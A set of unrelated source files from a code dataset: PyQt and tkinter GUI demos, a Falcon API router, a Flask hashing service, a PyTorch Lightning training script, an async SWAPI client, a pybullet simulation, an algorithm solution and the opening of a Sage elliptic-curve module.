10px;\\n\"\n\" border: none;\\n\"\n\" border-radius: 10px;\\n\"\n\" background-color: #00A8E8;\\n\"\n\" color: white;\\n\"\n\" margin : 10px 5px; \\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"}\")\n self.left_menu_top_buttons.setObjectName(\"left_menu_top_buttons\")\n self.formLayout = QtWidgets.QFormLayout(self.left_menu_top_buttons)\n self.formLayout.setObjectName(\"formLayout\")\n self.scrollArea.setWidget(self.left_menu_top_buttons)\n self.verticalLayout_3.addWidget(self.scrollArea)\n self.SignOut = QtWidgets.QPushButton(self.left_side_menu)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.SignOut.setFont(font)\n self.SignOut.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.SignOut.setStyleSheet(\"\\n\"\n\"\\n\"\n\"QPushButton{\\n\"\n\" padding: 20px 10px;\\n\"\n\" border: none;\\n\"\n\" border-radius: 10px;\\n\"\n\" background-color: #00A8E8;\\n\"\n\" color: white;\\n\"\n\" margin : 10px 5px; \\n\"\n\" background-image: url(:/icons/icons/sign-out.png);\\n\"\n\" background-repeat: none;\\n\"\n\" padding-left: 50px;\\n\"\n\" background-position: left center ;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"}\")\n self.SignOut.setObjectName(\"SignOut\")\n self.verticalLayout_3.addWidget(self.SignOut)\n self.horizontalLayout.addWidget(self.left_side_menu)\n self.center_main_items = QtWidgets.QFrame(self.main_body)\n self.center_main_items.setStyleSheet(\"\")\n self.center_main_items.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.center_main_items.setFrameShadow(QtWidgets.QFrame.Raised)\n self.center_main_items.setObjectName(\"center_main_items\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.center_main_items)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.stackedWidget = QtWidgets.QStackedWidget(self.center_main_items)\n self.stackedWidget.setStyleSheet(\"background-color: #FEFDFC;\")\n self.stackedWidget.setObjectName(\"stackedWidget\")\n self.page = QtWidgets.QWidget()\n self.page.setObjectName(\"page\")\n self.stackedWidget.addWidget(self.page)\n self.page_2 = QtWidgets.QWidget()\n self.page_2.setObjectName(\"page_2\")\n self.stackedWidget.addWidget(self.page_2)\n self.verticalLayout_2.addWidget(self.stackedWidget)\n self.horizontalLayout.addWidget(self.center_main_items)\n self.verticalLayout.addWidget(self.main_body)\n self.main_footer = 
QtWidgets.QFrame(self.centralwidget)\n self.main_footer.setMaximumSize(QtCore.QSize(16777215, 30))\n self.main_footer.setStyleSheet(\"QFrame{\\n\"\n\" background-color: grey;\\n\"\n\"}\")\n self.main_footer.setFrameShape(QtWidgets.QFrame.WinPanel)\n self.main_footer.setFrameShadow(QtWidgets.QFrame.Raised)\n self.main_footer.setObjectName(\"main_footer\")\n self.verticalLayout.addWidget(self.main_footer)\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.retranslateUi(MainWindow)\n self.stackedWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n \n self.mainwindow=MainWindow\n self.initialiseMainWindow()\n self.left_menu_toggle_btn.clicked.connect(lambda:self.slideLeftMenu(\"1\"))\n self.SignOut.clicked.connect(self.signOut)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.SignOut.setText(_translate(\"MainWindow\", \"Sign Out\"))\n","repo_name":"ahmedhamila/GMAO","sub_path":"Source/Views/AllUsersViews/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":40931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35315157793","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QLabel,\n QPushButton, QSpinBox)\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import pyqtSlot\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super(MainWindow, self).__init__()\n # GUI proprieties\n self.setGeometry(400, 100, 300, 200)\n self.setWindowTitle('My first app')\n\n # Labels\n # Label 1: Plain text\n label1 = QLabel('My first application says:', self)\n label1.setFixedWidth(120) # fixing the width of the label\n label1.move(10, 10)\n # Label 2: Rich text\n self.label2 = QLabel(\"\", self)\n self.label2.move(130, 10)\n message = \"
Hello Python!\"\n self.label2.setText(message)\n self.label2.setFixedWidth(120)\n # Label 3: Image\n self.label3 = QLabel(\"\", self)\n self.label3.setFixedSize(50, 50)\n self.label3.setPixmap(QPixmap(\"greating.svg\"))\n self.label3.show()\n self.label3.move(250, 10)\n\n # Buttons\n # Push Button 1: Hello Button\n button1 = QPushButton('Hello', self)\n button1.setToolTip('This is the Hello Button')\n button1.move(50, 50)\n button1.clicked.connect(self.on_click_button1)\n # Push Button 2: Goodbye Button\n button2 = QPushButton('Goodbye', self)\n button2.setToolTip('This is the Goodbye Button')\n button2.move(170, 50)\n button2.clicked.connect(self.on_click_button2)\n\n # Spin Box: Spin Box change integer value from 0 to 100\n self.spb = QSpinBox(self)\n self.spb.setMinimum(0)\n self.spb.setMaximum(100)\n self.spb.setValue(50)\n self.spb.setSingleStep(1)\n self.spb.setGeometry(80, 110, 50, 20) # set geometry (x,y,width,hight)\n self.spb.valueChanged.connect(self.spb_valuechange)\n self.spb.move(180, 160)\n # set a label saying what Spin Box refer to\n txt = QLabel('The value is: ', self)\n txt.setGeometry(10, 110, 75, 20) # set geometry (x,y,width,hight)\n # set a label to a receive a value from the spin box\n self.val = QLabel(\"\", self)\n # set geometry (x,y,width,height)\n self.val.setGeometry(150, 110, 75, 20)\n\n @pyqtSlot() # Push Button 1 signal\n def on_click_button1(self):\n message = \"
Hello Python!\"\n self.label2.setText(message)\n self.label2.setFixedWidth(120)\n self.label3.setPixmap(QPixmap(\"greating.svg\"))\n self.label3.show()\n\n @pyqtSlot() # Push Button 2 signal\n def on_click_button2(self):\n message = \"
Goodbye Python!\"\n self.label2.setText(message)\n self.label2.setFixedWidth(120)\n self.label3.setPixmap(QPixmap(\"greating.svg\"))\n self.label3.show()\n\n @pyqtSlot(int) # Spin Box signal\n def spb_valuechange(self, value):\n '''\n the value of the spin box is an integer, \n convert it to a string using the str() function.\n '''\n self.val.setText(str(self.spb.value()))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n MyApplication = MainWindow()\n MyApplication.show()\n sys.exit(app.exec_())\n","repo_name":"xu-nuo-xu/Understanding_Optics_with_Python","sub_path":"programs/chapter2/SpinBox.py","file_name":"SpinBox.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"74716826085","text":"# -*- coding:utf-8 -*-\nimport os\nimport sys\nimport copy\nimport falcon\nimport route.docs_route as r_docs\nfrom config import *\nfrom api.middleware import AuthMiddleware\nimport function.basic as fb\n\nROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(ROOT_PATH)\n\n\nclass Wsgi(object):\n app = falcon.API(middleware=[AuthMiddleware()])\n root_path = os.getcwd()\n root_child_path = '/api'\n root_api_path = os.getcwd() + root_child_path\n api_files = []\n\n def __init__(self):\n self.api_files = fb.get_files(self.root_api_path, '_api.py')\n\n def process(self):\n \"\"\"api文件夹下的api初始化\"\"\"\n if self.api_files:\n config = load_config_auto()\n profix = config.DOMAIN_PROFIX\n for f in self.api_files:\n f = f.split('.')[0]\n m_path = \"api.\"+f\n\n m = __import__(m_path, {}, {}, ['not None'])\n f = f.split('_')\n f_c = len(f)\n f_name = ''\n if f_c > 1:\n for i in range(0, f_c, 1):\n f_name += f[i].capitalize()\n else:\n f_name = f_c[0].capitalize()\n\n obj = getattr(m, f_name)()\n self.app.add_route(profix + obj.api_path, obj)\n\n def my_serializer(req, exception):\n \"\"\"修改error的默认content-type类型\"\"\"\n exception = exception.to_json()\n return \"application/json\", exception\n self.app.set_error_serializer(my_serializer)\n \"\"\"\n 添加others路径\n \"\"\"\n for i in [r_docs.Docs(), r_docs.DocsHtml(), r_docs.DocsResource(),\n r_docs.DocsJs(), r_docs.DocsCss(), r_docs.DocsFont()]:\n self.app.add_route(profix + i.path, i)\n\n def get_app(self):\n self.process()\n return self.app\n\no = Wsgi()\napp = o.get_app()","repo_name":"dingdan539/healer","sub_path":"src/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70262165604","text":"import tkinter\nimport numpy as np\nfrom tkinter import *\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\n\n\n\nroot = tkinter.Tk()\nroot.geometry(\"400x680\")\nroot.wm_title(\"PY-83\")\n\n#setting up graphing grid on canvas:\nfig = Figure(figsize=(5, 3), dpi=100)\na = fig.add_subplot(111)\ncanvas = FigureCanvasTkAgg(fig, master=root)\ncanvas.get_tk_widget().pack(side=tkinter.TOP)\n\n#setting up interval for plotting:\nx=np.linspace(-5,5,100)\n\n#plotting function:\ndef plot():\n y = eval(e.get())\n lines = a.plot(x,y,'r')\n canvas.draw()\n\n#setting up toolbar:\ntoolbar = NavigationToolbar2Tk(canvas, root)\ntoolbar.update()\ncanvas.get_tk_widget().pack(side=tkinter.TOP)\n\n\n\n#adding number to the screen:\ndef button_click(number):\n current = e.get()\n 
e.delete(0,END)\n e.insert(0, str(current)+str(number))\n return\n\n#four basic operations\ndef button_add():\n first_number = e.get()\n global f_num\n global math\n math = \"addition\"\n f_num = float(first_number)\n e.delete(0, END)\n\ndef button_subtract():\n first_number = e.get()\n global f_num\n global math\n math = \"subtraction\"\n f_num = float(first_number)\n e.delete(0, END)\n \ndef button_multiply():\n first_number = e.get()\n global f_num\n global math\n math = \"multiplication\"\n f_num = float(first_number)\n e.delete(0, END)\n\n\ndef button_divide():\n first_number = e.get()\n global f_num\n global math\n math = \"division\"\n f_num = float(first_number)\n e.delete(0, END)\n\n#equal sign\ndef button_equal():\n second_number = e.get()\n e.delete(0,END)\n\n if math == \"addition\":\n e.insert(0, f_num + float(second_number))\n\n if math == \"subtraction\":\n e.insert(0, f_num - float(second_number))\n\n if math == \"multiplication\":\n e.insert(0, f_num * float(second_number))\n\n if math == \"division\":\n e.insert(0, f_num / float(second_number))\n\n#clear entry and screen\ndef button_clear():\n e.delete(0,END)\n a.lines=[]\n canvas.draw()\n\n#placing buttons on screen: \nbutton_1 = Button(root, text=\"1\",padx=40,pady=20, command=lambda:button_click(1))\nbutton_2 = Button(root, text=\"2\",padx=40,pady=20, command=lambda:button_click(2))\nbutton_3 = Button(root, text=\"3\",padx=40,pady=20, command=lambda:button_click(3))\n\nbutton_4 = Button(root, text=\"4\",padx=40,pady=20, command=lambda:button_click(4))\nbutton_5 = Button(root, text=\"5\",padx=40,pady=20, command=lambda:button_click(5))\nbutton_6 = Button(root, text=\"6\",padx=40,pady=20, command=lambda:button_click(6))\n\nbutton_7 = Button(root, text=\"7\",padx=40,pady=20, command=lambda:button_click(7))\nbutton_8 = Button(root, text=\"8\",padx=40,pady=20, command=lambda:button_click(8))\nbutton_9 = Button(root, text=\"9\",padx=40,pady=20, command=lambda:button_click(9))\n\nbutton_0 = Button(root, text=\"0\",padx=40,pady=20, command=lambda:button_click(0))\nbutton_equal = Button(root, text=\"=\",padx=40,pady=20, command=button_equal, bg=\"#EA3C53\")\nbutton_divide = Button(root, text=\"÷\",padx=40,pady=20, command=button_divide, bg=\"#89CFF0\")\n\nbutton_add = Button(root, text=\"+\",padx=40,pady=20, command=button_add, bg=\"#89CFF0\")\nbutton_minus = Button(root, text=\"-\",padx=40,pady=20, command=button_subtract, bg=\"#89CFF0\")\nbutton_mult = Button(root, text=\"×\",padx=40,pady=20, command=button_multiply, bg=\"#89CFF0\")\nbutton_dot = Button(root, text=\".\",padx=40,pady=20, command=lambda:button_click(\".\"))\n\nbutton_clear = Button(root, text=\"Clear\",padx=53,pady=4, command=button_clear)\n\nbutton_plot = Button(root, text=\"Plot\",padx=30,pady=4, command=plot, bg=\"#A0D6B4\")\n\n\n\nbutton_plot.place(x=300,y=310)\n\nbutton_7.place(x=0,y=350)\nbutton_8.place(x=100,y=350)\nbutton_9.place(x=200,y=350)\n\nbutton_4.place(x=0,y=420)\nbutton_5.place(x=100,y=420)\nbutton_6.place(x=200,y=420)\n\nbutton_1.place(x=0,y=490)\nbutton_2.place(x=100,y=490)\nbutton_3.place(x=200,y=490)\n\nbutton_0.place(x=0,y=560)\nbutton_dot.place(x=100,y=560)\nbutton_equal.place(x=200,y=560)\n\nbutton_add.place(x=300,y=350)\nbutton_minus.place(x=300,y=420)\nbutton_mult.place(x=300,y=490)\nbutton_divide.place(x=300,y=560)\n\nbutton_clear.place(x=250,y=640)\n\n#placing entry on the screen:\ne = Entry(root, width = 45, borderwidth=5)\ne.place(x=10,y=310)\n#functions inputed on the entry are plotted on the screen, try something like 
x**2\n#other functions need to be typed with reference to np as np.sin(x) or np.exp(x), for example\n\n\ntkinter.mainloop()\n","repo_name":"thatguysilva/PY-83","sub_path":"py83-source.py","file_name":"py83-source.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"7939904822","text":"from shared_config import ex\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import EarlyStopping\nimport models\nfrom utils.existed_checkpoint import ExistedModelCheckpoint\nimport datasets\nfrom pytorch_lightning import loggers as pl_loggers\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport os\nfrom utils import load_from_config,config_name\nimport torch\nfrom utils import samplers\nimport numpy as np\nfrom torch.utils.data import SequentialSampler,RandomSampler\nfrom torch import nn\nimport torch\nimport re\n\ndef assign_parameter(model,name,param):\n names = name.split('.')\n for i in names[:-1]:\n model = model.__getattr__(i)\n model.__setattr__(names[-1],param)\n \nclass SharedModel(nn.Module):\n def __init__(self,model1,model2,shared_param_mask,**kwargs):\n super().__init__(**kwargs)\n share_params = []\n for n,p in model1.named_parameters():\n if re.match(shared_param_mask,n):\n share_params.append(n)\n assign_parameter(model2,n,p)\n self.model1 = model1\n self.model2 = model2\n \n def forward(self,x):\n if self.training:\n size = x.shape[0]//2\n x1,x2 = tuple(torch.split(x,[size,size]))\n return torch.cat([self.model1(x1),self.model2(x2)])\n else:\n return self.model2(x)\n\n\nclass MultyDatasetBatchSampler:\n def __init__(self,dataset,batch_size,shuffle=True,sampler=None,label_names=None):\n assert batch_size% len(dataset.datasets)==0,'wrong!'\n self.offsets = np.array(dataset.offsets)\n lo,hi = dataset.offsets,dataset.offsets[1:]+[None]\n if sampler is None:\n if shuffle:\n self.samplers = [RandomSampler(i) for i in dataset.datasets]\n else:\n self.samplers = [SequentialSampler(i) for i in dataset.datasets]\n else:\n self.samplers = [load_from_config(sampler, samplers)(labels=dataset.labels[l:h],\n label_names=dataset.label_names) for l,h in zip(lo,hi)]\n self.batch_size = batch_size\n \n def __iter__(self):\n batch = []\n for idx in zip(*self.samplers):\n batch.append(idx)\n if len(batch) == self.batch_size//len(self.samplers):\n batch = (np.array(batch)+self.offsets[None,:]).transpose().flatten()\n yield list(batch)\n batch = []\n\n def __len__(self) -> int:\n return min([len(i) for i in self.samplers])//(self.batch_size//len(self.samplers))\n \n@ex.capture\ndef load_dataset(dataset, mode, sampler=None,batch_size=64,input_size=(224,224),num_workers=8,reduce_size=None,label_names=None):\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n input_size = tuple(input_size)\n if mode == 'train':\n transform = transforms.Compose([\n transforms.RandomResizedCrop(input_size, (0.8, 1.2)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n else:\n transform = transforms.Compose([\n transforms.Resize(input_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n if not isinstance(dataset,list):\n dataset = [dataset]\n dataset = [load_from_config(i,datasets)(mode=mode,transform=transform,reduce_size=reduce_size) for i in dataset]\n dsizes = [len(i) for i in dataset]\n dataset = datasets.JoinDatasets(dataset,use_names=label_names)\n batch_sampler = 
MultyDatasetBatchSampler(dataset,batch_size,shuffle=(mode=='train'),sampler=sampler,label_names=label_names)\n loader = DataLoader(dataset,batch_sampler=batch_sampler, num_workers=num_workers)\n return loader,dataset\n\n\n\n\n\n\n@ex.capture\ndef load_train_val_test(dataset=None,train_dataset=None,val_dataset=None,test_dataset=None,sampler=None,label_names=None):\n \n train = load_dataset(train_dataset or dataset,mode='train',sampler=sampler,label_names=label_names)\n if label_names is None:\n label_names = train[1].label_names\n val = load_dataset(val_dataset or dataset,mode='val',label_names=label_names,sampler=None)\n test_dataset = test_dataset or dataset\n if not isinstance(test_dataset,list):\n test_dataset = [test_dataset]\n test = [load_dataset(i,mode='test',label_names=label_names,sampler=None) for i in test_dataset]\n\n number_of_samples = np.concatenate([(i[1].labels==1).sum(0)[:,None] for i in [train,val,*test]],1)\n print('\\n'.join(['{:15s} | '.format(n)+' | '.join(['{:6d}'.format(i) for i in c]) for n,c in zip(label_names,number_of_samples)]))\n return label_names, train[0],val[0],[i[0] for i in test]\n\n\ndef load_backdone(label_names,backbone,shared_param_mask,pretrained_backbone):\n backbone = load_from_config(backbone,models)()\n if not (pretrained_backbone is None):\n backbone.load_state_dict(torch.load(pretrained_backbone)['state_dict'],strict=True)\n \n if hasattr(backbone,'classifier'):\n backbone.classifier = nn.Sequential(nn.Linear(backbone.classifier.in_features, len(label_names)), nn.Sigmoid())\n else:\n backbone.fc= nn.Sequential(nn.Linear(self.backbone.fc.in_features, len(label_names)), nn.Sigmoid())\n return backbone\n \n@ex.capture\ndef load_model(label_names,optimizer,scheduler,backbone,shared_param_mask,unfreeze_epoch=0,pretrained_backbone=None):\n backbone1 = load_backdone(label_names,backbone,shared_param_mask,pretrained_backbone)\n backbone2 = load_backdone(label_names,backbone,shared_param_mask,pretrained_backbone) \n backbone = SharedModel(backbone1,backbone2,shared_param_mask)\n \n optimizer = load_from_config(optimizer,torch.optim)\n lr_scheduler = load_from_config(scheduler,torch.optim.lr_scheduler)\n model = models.BasicClassifierModel(backbone, label_names, optimizer, lr_scheduler,unfreeze_epoch=unfreeze_epoch)\n return model\n\n@ex.capture\ndef load_trainer(exp_root,exp_name,version,_config,load_epoch=None):\n tb_logger = pl_loggers.TensorBoardLogger(exp_root,exp_name,version)\n checkpointer = ExistedModelCheckpoint(monitor='val_loss',\n mode='min',\n save_top_k=5,\n dirpath = os.path.join(exp_root,exp_name,version,'checkpoints'),\n filename=config_name(_config['backbone'])+'-{epoch}-{val_loss:.3f}-{train_loss:.3f}')\n\n callbacks = [checkpointer,EarlyStopping(monitor='val_loss',patience=10)]\n trainer = pl.Trainer(logger=tb_logger,\n resume_from_checkpoint=checkpointer.get_checkpoint_path(load_epoch),\n callbacks=callbacks,**_config.get('trainer',{}))\n return trainer,checkpointer\n\n@ex.capture\ndef write_results(path,results,exp_root,exp_name,version):\n open(os.path.join(exp_root,exp_name,version,'%s.csv'%(path.split('/')[-1])),'a').write('\\n'.join(['%s,%s'%(k,str(v)) for k,v in results[0].items()])+'\\n')\n\n@ex.command\ndef test(load_epoch):\n label_names, _, _, test_loaders = load_train_val_test()\n model = load_model(label_names)\n trainer,checkpointer = load_trainer()\n for test_loader in test_loaders:\n results = trainer.test(model=model,test_dataloaders=test_loader)\n 
write_results(checkpointer.get_checkpoint_path(load_epoch),results)\n\n\n@ex.automain\ndef main(load_epoch):\n label_names,train_loader, val_loader, test_loaders = load_train_val_test()\n model=load_model(label_names)\n trainer,checkpointer = load_trainer()\n try:\n trainer.fit(model, train_loader, val_loader)\n finally:\n if not checkpointer.get_checkpoint_path(load_epoch) is None:\n for test_loader in test_loaders:\n results = trainer.test(model=model, test_dataloaders=test_loader)\n write_results(checkpointer.get_checkpoint_path(load_epoch), results)","repo_name":"nvvaulin/medical_imaging","sub_path":"shared_train.py","file_name":"shared_train.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18168514064","text":"# service1.py\nfrom flask import Flask, request\nimport hashlib\n\napp = Flask(__name__)\n\n@app.route('/calculate_hash', methods=['POST'])\ndef calculate_hash():\n data = request.get_json()\n if 'text' not in data:\n return \"Error: 'text' parameter not provided.\", 400\n\n text = data['text']\n hash_value = hashlib.sha256(text.encode()).hexdigest()\n return {'hash': hash_value}\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"DSever776/avl_task","sub_path":"service1/service1.py","file_name":"service1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1023608161","text":"import asyncio\nimport time\n\nfrom more_itertools import chunked\n\nfrom db import engine, Session, People, Base\n\nimport aiohttp\n\nURL = 'https://swapi.dev/api'\n\nCHUNK_SIZE = 10\n\n\nasync def get_person(person_id: int) -> dict:\n session = aiohttp.ClientSession()\n response = await session.get(f'{URL}/people/{person_id}')\n response_json = await response.json()\n await session.close()\n return response_json\n\n\nasync def get_people(start, end):\n for id_chunk in chunked(range(start, end), CHUNK_SIZE):\n coroutines = [get_person(i) for i in id_chunk]\n result = await asyncio.gather(*coroutines)\n for person in result:\n yield person\n\n\nasync def main():\n async for person in get_people(1, 17):\n print(person['name'])\n print(person['mass'])\n\nstart = time.time()\nasyncio.run(main())\nprint('Время работы ', time.time() - start)\n","repo_name":"Alexnor11/web_asyncio","sub_path":"get_sw_async.py","file_name":"get_sw_async.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8704550768","text":"import pybullet as p\nimport pyrosim.pyrosim as pyrosim\nimport pybullet_data\nimport time\nimport numpy as np\nimport random\nimport constants as c\nfrom world import WORLD\nfrom robot import ROBOT\n\nclass SIMULATION:\n \n def __init__(self, directOrGui, solutionID):\n \n if directOrGui == \"DIRECT\":\n physicsClient = p.connect(p.DIRECT)\n else:\n physicsClient = p.connect(p.GUI)\n p.setAdditionalSearchPath(pybullet_data.getDataPath())\n p.setGravity(0,0,-9.8)\n self.world = WORLD()\n self.robot = ROBOT(solutionID)\n \n pyrosim.Prepare_To_Simulate(self.robot.robotId)\n self.robot.Prepare_To_Sense()\n self.robot.Prepare_to_Act()\n \n\n \n \n \n def Run(self):\n for i in range(c.iterations):\n p.stepSimulation()\n time.sleep(1/24000)\n self.robot.Sense(i)\n self.robot.Think(i)\n self.robot.Act(i)\n\n \n def Get_Fitness(self):\n self.robot.Get_Fitness()\n \n def 
__del__(self):\n p.disconnect()","repo_name":"pacochow/Evolving-bots","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15054570151","text":"'''from functools import reduce\nli = [1,2,3,4,5]\nprint(reduce(lambda x,y:x*y, li))\n'''\n # 120 = ((((1*2)*3)*4)*5)\n\n\nstack = [1]\nadd_tmp = 0\nresult = 0\ntmp = 0\ncc = 0\ncheck = True\nli = [0 for i in range(100001)]\nfor _ in range(int(input())):\n comnd = input().split(' ')\n if comnd[0] == 'for':\n num = comnd[1]\n stack.append(num)\n cc += 1\n elif comnd[0] == 'add':\n if cc == 0:\n li[cc] += 1\n else:\n stack.append('add')\n elif comnd[0] == 'end':\n a = stack.pop()\n while a.isalpha():\n #add_tmp += 1\n li[cc] += 1\n a = stack.pop()\n cc -= 1\n a = int(a)\n li[cc] = li[cc] + li[cc+1]*a\n li[cc+1] = 0\n if li[cc] >= 2**32:\n check = False\n break\n #add_tmp = a*add_tmp\n '''if cc == 0:\n result += add_tmp\n add_tmp = 0'''\n\nif li[0] >= 2**32 or check == False :\n #print(result)\n print(\"OVERFLOW!!!\")\nelse:\n #print(result)\n print(li[0])\n\n\n\n'''8\nfor 2\nfor 3\nadd\nend\nfor 4\nadd\nend\nend'''\n","repo_name":"HoeYeon/Algorithm","sub_path":"Python_Algorithm/codeforce/1175B(리스트 사칙연산 모두 적용).py","file_name":"1175B(리스트 사칙연산 모두 적용).py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39814586291","text":"'''\n102. Binary Tree Level Order Traversal\nLink: https://leetcode.com/problems/binary-tree-level-order-traversal/\n\nGiven a binary tree, return the level order traversal of\nits nodes' values. (ie, from left to right, level by level).\n\nConduct a breadth-first search for level order traversal\n\nGiven binary tree [3, 9, 20, null, null, 15, 7],\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its level order traversal as:\n\n[\n [3],\n [9, 20],\n [15, 7]\n]\n'''\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\ndef levelOrder(root: TreeNode):\n '''\n Time complexity: O(N) since each node is processed exactly once.\n Space complexity: O(N) to keep the output structure that contains N node values.\n '''\n\n if not root:\n return []\n\n queue, res = [root], []\n\n while queue:\n level_size = len(queue)\n level = []\n\n for _ in range(0, level_size):\n node = queue.pop(0)\n level.append(node.val)\n\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n\n res.append(level)\n\n return res\n","repo_name":"ErickMwazonga/sifu","sub_path":"trees/bfs/bfs_traversal_level.py","file_name":"bfs_traversal_level.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"17512864399","text":"r\"\"\"\nIsomorphisms between Weierstrass models of elliptic curves\n\nAUTHORS:\n\n- Robert Bradshaw (2007): initial version\n- John Cremona (Jan 2008): isomorphisms, automorphisms and twists\n in all characteristics\n- Lorenz Panny (2021): :class:`EllipticCurveHom` interface\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2007 Robert Bradshaw \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n#\n# This code is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR 
A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# The full text of the GPL is available at:\n#\n# https://www.gnu.org/licenses/\n# ****************************************************************************\n\nfrom sage.structure.element import get_coercion_model\n\nfrom .constructor import EllipticCurve\nfrom sage.schemes.elliptic_curves.hom import EllipticCurveHom\nfrom sage.structure.richcmp import (richcmp_method, richcmp, richcmp_not_equal,\n op_NE)\nfrom sage.structure.sequence import Sequence\nfrom sage.rings.all import Integer, PolynomialRing\n\n\n@richcmp_method\nclass baseWI(object):\n r\"\"\"\n This class implements the basic arithmetic of isomorphisms between\n Weierstrass models of elliptic curves.\n\n These are specified by lists of the form `[u,r,s,t]` (with\n `u\\not=0`) which specifies a transformation `(x,y) \\mapsto (x',y')`\n where\n\n `(x,y) = (u^2x'+r , u^3y' + su^2x' + t).`\n\n INPUT:\n\n - ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an\n isomorphism between Weierstrass models.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI()\n (1, 0, 0, 0)\n sage: baseWI(2,3,4,5)\n (2, 3, 4, 5)\n sage: R. = QQ[]\n sage: baseWI(u,r,s,t)\n (u, r, s, t)\n \"\"\"\n def __init__(self, u=1, r=0, s=0, t=0):\n r\"\"\"\n Constructor: check for valid parameters (defaults to identity)\n\n INPUT:\n\n - ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an\n isomorphism between Weierstrass models.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI()\n (1, 0, 0, 0)\n sage: baseWI(2,3,4,5)\n (2, 3, 4, 5)\n sage: R. = QQ[]\n sage: baseWI(u,r,s,t)\n (u, r, s, t)\n \"\"\"\n if u == 0:\n raise ValueError(\"u!=0 required for baseWI\")\n self.u = u\n self.r = r\n self.s = s\n self.t = t\n\n def __richcmp__(self, other, op):\n \"\"\"\n Standard comparison function.\n\n The ordering is just lexicographic on the tuple `(u,r,s,t)`.\n\n .. 
